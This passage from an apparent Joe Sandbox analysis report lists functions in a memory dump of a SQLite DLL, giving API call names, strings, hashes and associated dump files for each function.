                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_logsqlite3_mutex_leave$sqlite3_mutex_enter
                                                    • String ID:
                                                    • API String ID: 1015584638-0
                                                    • Opcode ID: 23ff65156954d73aba91898869837fd3ec720ee766246a1c09e114aa0dcce5b6
                                                    • Instruction ID: a2d9c72bd6979fa4165dc3b624364682f3d098ec0a7e4d49a666c84b6a07e7cc
                                                    • Opcode Fuzzy Hash: 23ff65156954d73aba91898869837fd3ec720ee766246a1c09e114aa0dcce5b6
                                                    • Instruction Fuzzy Hash: 9D31227520A6418BEB04AF68C4A1B4677E1EFC9318F29C56DEC488F35AD739D841EB43
                                                    Function 61E44C8D Relevance: 7.6, APIs: 5, Instructions: 76COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E44CA2
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E44CAD
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E44D66
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E44D71
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 1477753154-0
                                                    • Opcode ID: b56d698b17c5cc7e6b74d8873afc87c598d2eca3a267aa780d9352a21d1956a7
                                                    • Instruction ID: 736584ff8bbcefa8775b1b1d8917eafcf9340ce1d6e5960cecbefdcc9fb5dcb3
                                                    • Opcode Fuzzy Hash: b56d698b17c5cc7e6b74d8873afc87c598d2eca3a267aa780d9352a21d1956a7
                                                    • Instruction Fuzzy Hash: 59217C747087528BD701AFA8E48070ABBF5EF85318F24C46EEC988B345DB74D851CB82
                                                    Function 61E34C34 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_initialize.SQLITE3 ref: 61E34C42
                                                      • Part of subcall function 61E17D9D: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E17DD4
                                                      • Part of subcall function 61E17D9D: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21FFA), ref: 61E17E08
                                                      • Part of subcall function 61E17D9D: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E18153
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E34C5A
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E34C7D
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E34CC1
                                                    • sqlite3_memory_used.SQLITE3 ref: 61E34CC6
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter$sqlite3_configsqlite3_initializesqlite3_memory_used
                                                    • String ID:
                                                    • API String ID: 2853221962-0
                                                    • Opcode ID: dfb0f96b138980c5a6a60c59f5766c6bb669fc7cb9715ea66773d005dc7aa4c4
                                                    • Instruction ID: 037f8c9daebb68fe637279f5c25e7bbaab550abdca41c161f407b429832bc755
                                                    • Opcode Fuzzy Hash: dfb0f96b138980c5a6a60c59f5766c6bb669fc7cb9715ea66773d005dc7aa4c4
                                                    • Instruction Fuzzy Hash: 77112E31A14A559BDB08DFBAC44049D77E5BBCA314B24CA2BE954DB340E731E8818B81
                                                    Function 61E26D14 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_win32_is_nt
                                                    • String ID: winAccess
                                                    • API String ID: 2284118020-3605117275
                                                    • Opcode ID: a71dec1c6a8c25fa824c486ff13e728697d1badbf545f609830d75b4830920b8
                                                    • Instruction ID: 1b75e179348b4d00ab9a37f7e408ef24722f720dce440250f2a33d3fdc78ae69
                                                    • Opcode Fuzzy Hash: a71dec1c6a8c25fa824c486ff13e728697d1badbf545f609830d75b4830920b8
                                                    • Instruction Fuzzy Hash: 4731727190469DCFDB00AFA8C85439EB7B0FB89328F25C628DC6597384D774D996CB82
                                                    Function 61E3867C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 61E24ED6: sqlite3_value_text.SQLITE3 ref: 61E24EE9
                                                      • Part of subcall function 61E24ED6: sqlite3_value_bytes.SQLITE3 ref: 61E24EF5
                                                      • Part of subcall function 61E24ED6: sqlite3_get_auxdata.SQLITE3 ref: 61E24F13
                                                      • Part of subcall function 61E24ED6: memcmp.MSVCRT ref: 61E24F34
                                                    • sqlite3_value_text.SQLITE3 ref: 61E386E1
                                                      • Part of subcall function 61E38569: sqlite3_mprintf.SQLITE3 ref: 61E385BB
                                                      • Part of subcall function 61E38569: sqlite3_result_error.SQLITE3 ref: 61E385D5
                                                      • Part of subcall function 61E38569: sqlite3_free.SQLITE3 ref: 61E385DD
                                                    • sqlite3_result_subtype.SQLITE3 ref: 61E38785
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_value_text$memcmpsqlite3_freesqlite3_get_auxdatasqlite3_mprintfsqlite3_result_errorsqlite3_result_subtypesqlite3_value_bytes
                                                    • String ID: J$null
                                                    • API String ID: 3173415908-802103870
                                                    • Opcode ID: b65edc31093eebe5c15463c92f96c15db0c6148a8ef1af62338ac1303ab8b3fd
                                                    • Instruction ID: 37da3c831580d96340a110bc9ec424059e46a0c591be7b831ca33d7fb3854fb1
                                                    • Opcode Fuzzy Hash: b65edc31093eebe5c15463c92f96c15db0c6148a8ef1af62338ac1303ab8b3fd
                                                    • Instruction Fuzzy Hash: B0316874A00269DBDB21EE64C880F8E77B6AFC5358F20C169E848CB301DB34DA95CF81
                                                    Function 61E388C5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_value_text.SQLITE3 ref: 61E38900
                                                    • sqlite3_value_text.SQLITE3 ref: 61E38920
                                                    • sqlite3_result_value.SQLITE3 ref: 61E38968
                                                      • Part of subcall function 61E382CE: sqlite3_mprintf.SQLITE3 ref: 61E382E3
                                                      • Part of subcall function 61E382CE: sqlite3_result_error.SQLITE3 ref: 61E382F9
                                                      • Part of subcall function 61E382CE: sqlite3_free.SQLITE3 ref: 61E38301
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_value_text$sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_value
                                                    • String ID: replace
                                                    • API String ID: 822508682-211625029
                                                    • Opcode ID: d6a075fc9385f2870f31d54738133b66e58c9dec222dbe774954b2553996a209
                                                    • Instruction ID: b495a76041714367cee2641f541fe079985229e2439daef6e58c3e5da425b10b
                                                    • Opcode Fuzzy Hash: d6a075fc9385f2870f31d54738133b66e58c9dec222dbe774954b2553996a209
                                                    • Instruction Fuzzy Hash: F6213930A083999BCB11DF68C094A99BBF5AFC5368F29C519EC88CB350D735E945DB82
                                                    Function 61E1C06C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_malloc.SQLITE3 ref: 61E1C08A
                                                      • Part of subcall function 61E18306: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E17FE7,?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E1830E
                                                    • sqlite3_realloc.SQLITE3 ref: 61E1C0D8
                                                    • sqlite3_free.SQLITE3 ref: 61E1C0EE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                    • String ID: d
                                                    • API String ID: 211589378-2564639436
                                                    • Opcode ID: fec92f39fc0cf641781cb09932307d85cf5c1768cc2373b992d601d6050d7ff5
                                                    • Instruction ID: 0dab24422b3aaab0e7954a130753e66152b50dfb51cd1ffeb7d0ad6ad4cdfdad
                                                    • Opcode Fuzzy Hash: fec92f39fc0cf641781cb09932307d85cf5c1768cc2373b992d601d6050d7ff5
                                                    • Instruction Fuzzy Hash: E821E3B5A04245CFDB10DFA9C4C1A99BBF5BF89314F24846AC9489B319E738E845CFA1
                                                    Function 61E1F8AB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_value_int$sqlite3_result_blob
                                                    • String ID: <
                                                    • API String ID: 2918918774-4251816714
                                                    • Opcode ID: 19bd7e7b611b2361db068fe4acd9e139a126047da29ae0fc4575aae92c7aeede
                                                    • Instruction ID: 332952715c504e3dbb26be1f2f87f56dc6b652388c2674ae0367154961bdb7bb
                                                    • Opcode Fuzzy Hash: 19bd7e7b611b2361db068fe4acd9e139a126047da29ae0fc4575aae92c7aeede
                                                    • Instruction Fuzzy Hash: E1116AB590430A8FCB04DF6AD48099ABBF5FF88364F15856EE8588B360E334E951CF91
                                                    Function 61E28B58 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 61E28A4C: sqlite3_log.SQLITE3(?,?,?,?,?,61E28AFF), ref: 61E28A87
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E28B8B
                                                    • sqlite3_value_text.SQLITE3 ref: 61E28BA4
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E28BBE
                                                      • Part of subcall function 61E260ED: sqlite3_log.SQLITE3 ref: 61E26116
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_log$sqlite3_mutex_entersqlite3_mutex_leavesqlite3_value_text
                                                    • String ID: out of memory
                                                    • API String ID: 645246966-2599737071
                                                    • Opcode ID: 2b0b10450135ebd885a2efafbf90defc066e63970d37fc0b064ef14241d81b14
                                                    • Instruction ID: f9a63698f4cbaa5ed84e1c99b846ddefaeada963818a5c5e94380c32a98722d9
                                                    • Opcode Fuzzy Hash: 2b0b10450135ebd885a2efafbf90defc066e63970d37fc0b064ef14241d81b14
                                                    • Instruction Fuzzy Hash: 1901A4B4A082494BDB409FA5D8D0A1A77F4EF45318F28C4BDEC458F301EB35D8909B81
                                                    Function 61E01440 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: _Jv_RegisterClasses$libgcj-16.dll
                                                    • API String ID: 1646373207-328863460
                                                    • Opcode ID: ccbb33d15ff950a2ff05d596c0536fba40eb356bcee1b1094984d9043639e26f
                                                    • Instruction ID: 574e792d96d9ac02c72fce771a80fff81a5d31b36d40d47b6992fba8d434fdb1
                                                    • Opcode Fuzzy Hash: ccbb33d15ff950a2ff05d596c0536fba40eb356bcee1b1094984d9043639e26f
                                                    • Instruction Fuzzy Hash: BCE0EDB4514B029BF7406FE9884632EBAB9AFC670AF62C41CD4C9862A4E674C491C773
                                                    Function 61E1F4D8 Relevance: 6.2, APIs: 4, Instructions: 228COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_malloc.SQLITE3 ref: 61E1F53F
                                                      • Part of subcall function 61E18306: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E17FE7,?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E1830E
                                                    • sqlite3_free.SQLITE3 ref: 61E1F656
                                                    • sqlite3_result_error_code.SQLITE3 ref: 61E1F779
                                                    • sqlite3_result_double.SQLITE3 ref: 61E1F78E
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_result_doublesqlite3_result_error_code
                                                    • String ID:
                                                    • API String ID: 4229029058-0
                                                    • Opcode ID: 030d3163f1a824078c0238e10481283762cb6497cd0bf48cc6606ef0804457f9
                                                    • Instruction ID: 64c8126d5fe9324f5b4716a8a9f633777072e132da0c9099a74a6d46a329bfd9
                                                    • Opcode Fuzzy Hash: 030d3163f1a824078c0238e10481283762cb6497cd0bf48cc6606ef0804457f9
                                                    • Instruction Fuzzy Hash: CEA129B0A18609DFCB01DF69C58468EBBF5FF48354F218829E849E7368EB34D955CB81
                                                    Function 61E1EFD2 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: localtimesqlite3_mutex_entersqlite3_mutex_leavesqlite3_result_error
                                                    • String ID:
                                                    • API String ID: 2374424446-0
                                                    • Opcode ID: 87dd693d31a1c7904d52131ccf39c48a783ab55c6fcac0fb101741b51eead675
                                                    • Instruction ID: 2d9f979983bc4660cf9a05cb3e0f2ffc7db08dedcb85d0464c9f873ca1262a04
                                                    • Opcode Fuzzy Hash: 87dd693d31a1c7904d52131ccf39c48a783ab55c6fcac0fb101741b51eead675
                                                    • Instruction Fuzzy Hash: 5A511774E08359CFEB20CFA8C88478DBBF0AF45308F108599D448AB385D7799A85CF52
                                                    Function 61E3563E Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 61E18EEF: sqlite3_malloc.SQLITE3 ref: 61E18F1C
                                                    • sqlite3_free.SQLITE3 ref: 61E3566A
                                                      • Part of subcall function 61E09B91: sqlite3_mutex_enter.SQLITE3 ref: 61E09BB0
                                                    • sqlite3_stricmp.SQLITE3 ref: 61E3569D
                                                    • sqlite3_free.SQLITE3 ref: 61E35735
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_mallocsqlite3_mutex_entersqlite3_stricmp
                                                    • String ID:
                                                    • API String ID: 3567284914-0
                                                    • Opcode ID: 8a80b23bce06eaf5c9b22900ef604a8d15cfa84fed7883e434d6906df03bcdcd
                                                    • Instruction ID: c27ebb7c3caf4ec19cd1046ddb6cce8183802e5d52ef42df99a3c6eb7a41534b
                                                    • Opcode Fuzzy Hash: 8a80b23bce06eaf5c9b22900ef604a8d15cfa84fed7883e434d6906df03bcdcd
                                                    • Instruction Fuzzy Hash: 1431E774A04226CFDB01DFA9D48469EBBF0FF88344F658869D455A7310D73AE942CF51
                                                    Function 61E38A85 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_initialize.SQLITE3 ref: 61E38A91
                                                      • Part of subcall function 61E17D9D: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E17DD4
                                                      • Part of subcall function 61E17D9D: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21FFA), ref: 61E17E08
